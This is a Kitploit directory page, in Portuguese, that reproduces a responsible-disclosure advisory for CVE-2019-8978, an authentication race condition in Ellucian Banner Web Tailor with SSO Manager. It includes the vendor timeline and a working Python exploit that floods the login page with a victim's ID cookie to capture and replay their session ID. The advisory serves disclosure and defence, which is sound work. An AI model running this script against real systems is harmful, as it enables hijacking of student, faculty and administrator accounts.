Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-8978 — Divulgação de Vulnerabilidade do Banner Web Tailor e do Banner Enterprise Identity Services | Kitploit
Ferramentas/GitHubGitHub/seckatie/cve-2019-8978
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoAutenticação
GitHubseckatie/cve-2019-8978

CVE-2019-8978

Divulgação de Vulnerabilidade do Banner Web Tailor e do Banner Enterprise Identity Services

Ver Repositório
921há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

[CVE-2019-8978] Autenticação Incorreta (CWE-287) no Ellucian Banner Web Tailor e Banner Enterprise Identity Services

Autor: Katie Mulliken [email protected]

Agradecimentos a: Carnegie Mellon University CERT Coordination Center

Informações

  • Data em que foi encontrada: 17 de dez. de 2018
  • Fornecedor: Ellucian Company L.P.
  • Página do Fornecedor: https://www.ellucian.com
  • Produtos: Banner Web Tailor e Banner Enterprise Identity Services
  • Versões afetadas do Web Tailor: 8.8.3, 8.8.4, 8.9
  • Versões afetadas do Banner Enterprise Identity Services: 8.3, 8.3.1, 8.3.2, 8.4
  • CVE: CVE-2019-8978

Índice

  1. Resumo Executivo

  2. Produto

  3. Impacto e Recomendações

    a. Impacto

    b. Recomendações

  4. Detalhes Técnicos

    a. Descrição Técnica

    b. Código do Exploit

  5. Cronograma de Divulgação

  6. Referências

1. Resumo Executivo

Uma vulnerabilidade de autenticação incorreta (CWE-287) foi identificada no Banner Web Tailor e no Banner Enterprise Identity Services. Essa vulnerabilidade é produzida quando o SSO Manager é usado como mecanismo de autenticação para o Web Tailor, o que pode levar à divulgação de informações e à perda de integridade de dados para o(s) usuário(s) afetado(s). O fornecedor verificou a vulnerabilidade e produziu um patch que já está disponível. Para mais informações, consulte as publicações nas Comunidades Ellucian: [LINK NÃO FORNECIDO ANTES DO PRAZO] e Banner Enterprise Identity Services: [LINK NÃO FORNECIDO ANTES DO PRAZO]. ATUALIZAÇÃO: Aqui está o link para a seção IAM: E este é o link para a comunicação sobre a Vulnerabilidade do Banner Web Tailor e SSO Manager publicada no espaço Banner General & Banner Technical Community - ]

https://ecommunities.ellucian.com/message/252749#252749
https://ecommunities.ellucian.com/message/252810#252810[1

2. Produto

O Banner Web Tailor é uma ferramenta web, feita para instituições de ensino superior, que fornece funcionalidades de registro, gerenciamento de currículo, orientação acadêmica, administração e relatórios. Os estudantes conseguem acessar e alterar suas informações de matrícula, formatura e auxílio financeiro. Professores e mestres conseguem lançar notas finais e gerenciar seus cursos. Administradores conseguem acessar e alterar informações de estudantes e professores. É usado por centenas de instituições, muitas das quais optaram por usar o Single Sign-on Manager para participar de serviços de logon único baseados em CAS e SAML. [2]

3. Impacto e Recomendações

A. Impacto

O identificador exclusivo de um usuário, UDCID, é vazado por meio de um cookie e isso pode levar ao comprometimento da conta se esse identificador for capturado ou de outra forma conhecido; no caso testado, o UDCID era conhecido por ser o ID institucional impresso nos cartões de identificação. O UDCID poderia ser usado para explorar uma condição de corrida (race condition) que forneceria a um atacante acesso não autorizado. Para um estudante, o atacante poderia removê-lo de seus cursos, rejeitar auxílio financeiro, alterar suas informações pessoais, etc. Para um professor, isso poderia levar à incapacidade de gerenciar seus cursos, permitir que um estudante mal-intencionado lançasse notas finais falsas, etc. Para um administrador, um atacante poderia alterar informações de usuários, colocar retenções (holds) falsas em contas de estudantes, etc.

B. Recomendações

As organizações afetadas devem atualizar para a versão mais recente. Mais informações podem ser encontradas nas publicações nas Comunidades Ellucian: [LINK NÃO FORNECIDO ANTES DO PRAZO] e Banner Enterprise Identity Services: [LINK NÃO FORNECIDO ANTES DO PRAZO] ATUALIZAÇÃO: Aqui está o link para a seção IAM: https://ecommunities.ellucian.com/message/252749#252749 E este é o link para a comunicação sobre a Vulnerabilidade do Banner Web Tailor e SSO Manager publicada no espaço Banner General & Banner Technical Community - https://ecommunities.ellucian.com/message/252810#252810. Utilize as Comunidades Ellucian ou entre em contato com a Ellucian por meio do ActionLine para obter mais informações. Atualizações sobre esta divulgação estarão disponíveis no GitHub: https://github.com/JoshuaMulliken/CVE-2019-8978

4. Detalhes Técnicos

A. Descrição Técnica

A vulnerabilidade de autenticação incorreta pode ser explorada por meio de uma condição de corrida que ocorre no Ellucian Banner Web Tailor, em conjunto com o SSO Manager. Essa vulnerabilidade permite que atacantes remotos roubem a sessão de uma vítima (e causem negação de serviço) ao solicitar repetidamente a página principal inicial do Banner Web Tailor com o cookie IDMSESSID definido como o UDCID da vítima, que no caso testado é o ID institucional. Durante uma tentativa de login por uma vítima, o atacante pode aproveitar a condição de corrida e receberá o SESSID que era destinado a essa vítima. Consulte o código de prova de conceito localizado no link do GitHub abaixo para mais detalhes.

B. Código do Exploit

root@kitploit:~
""" exploit.py
This code is designed for Python 3 and requires the packages selenium and requests_threads. It does 50 simultaneous requests per batch and repeats. More or less may be required depending on your connection latency.
"""

import re, time, sys, select, os

from selenium import webdriver
from requests_threads import AsyncSession

requests_per_batch = 50

target_host = input("Please provide the target url (This is from the Web Tailor page post login): ")

target_id = input("Please provide the ID, which in the case tested is the institutional ID: ")

cookies = {
    'IDMSESSID': target_id,
}

session = AsyncSession(n=requests_per_batch)

async def _main():
    final_sessid = ""
    os.system('cls' if os.name == 'nt' else 'clear')
    print("To quit press Enter")
    while True:
        rs = []

        for _ in range(requests_per_batch):
            rs.append(await session.get(target_host, cookies=cookies))

        for response in rs:
            for c in response.cookies:
                if (c.name == 'SESSID'):
                    print(c.name, c.value)
                    final_sessid = c.value

        if sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
            line = input()
            break

    print("Last SESSID:", final_sessid)

    open_browser = input("Open a browser with this SESSID(y/n): ")
    if open_browser == "y":
    	"""
    	This feature requires a chromedriver for your operating system version. 
    	It can be found at https://sites.google.com/a/chromium.org/chromedriver/
    	Place it in the working directory of the exploit.py
    	"""
        browser = webdriver.Chrome(executable_path=os.path.join(os.getcwd(),"chromedriver"))

        browser.get(target_host)
        browser.add_cookie({
            "domain": target_host.split("/")[2],
            "name": "SESSID",
            "value": final_sessid,
            })
        browser.get(target_host)

        stay_open = input("Press enter to close")


session.run(_main)

5. Cronograma de Divulgação

18 de dezembro de 2018: Tentativa de relato por meio do formulário web de marketing da Ellucian e envio para [email protected]

20 de dezembro de 2018: Relatório enviado ao CERT Coordination Center na Carnegie Mellon University

2 de janeiro de 2019: Relatório enviado a um CISO da Ellucian que foi descoberto via LinkedIn

2 de janeiro de 2019: Solicitação de informações sobre o procedimento de divulgação responsável à University of South Carolina

3 de janeiro de 2019: Foi-me dito para relatar por meio do ActionLine pela Ellucian

4 de janeiro de 2019: Foi-me dito pela University of South Carolina que não há procedimento para relatar vulnerabilidades

4 de janeiro de 2019: Informei à University of South Carolina que havia descoberto uma vulnerabilidade no Banner

18 de fevereiro de 2019: O CERT me informou sobre a falha em contatar o fornecedor e me aconselhou a divulgar publicamente

25 de fevereiro de 2019: Enviei o rascunho do aviso à Ellucian e defini a data de divulgação para 4 de março.

28 de fevereiro de 2019: Executei uma demonstração da vulnerabilidade para a Ellucian por meio de uma conferência no Zoom

1 de março de 2019: A University of South Carolina pediu que eu adiasse a publicação

21 de março de 2019: A University of South Carolina recebeu um patch adaptado (backport) da Ellucian

26 de março de 2019: A Ellucian finalizou os patches para todas as versões

29 de março de 2019: Foi-me dito pela Ellucian que a University of South Carolina faria alterações em 1º de abril

1 de abril de 2019: Solicitei informações sobre o status do patch à University of South Carolina

5 de abril de 2019: A University of South Carolina forneceu uma previsão (ETA) de 30 de abril de 2019

30 de abril de 2019: A University of South Carolina atualizou a previsão para meados de maio

7 de maio de 2019: Defini a data de publicação da divulgação para 13 de maio

10 de maio de 2019: A University of South Carolina publicou um aviso de indisponibilidade planejada para todos os serviços Banner, agendada para 11 de maio

11 de maio de 2019: A University of South Carolina instalou o patch com sucesso

13 de maio de 2019: Divulgação publicada

6. Referências

1. https://cwe.mitre.org/data/definitions/287.html

2. https://cwe.mitre.org/data/definitions/287.html

Baixar ferramenta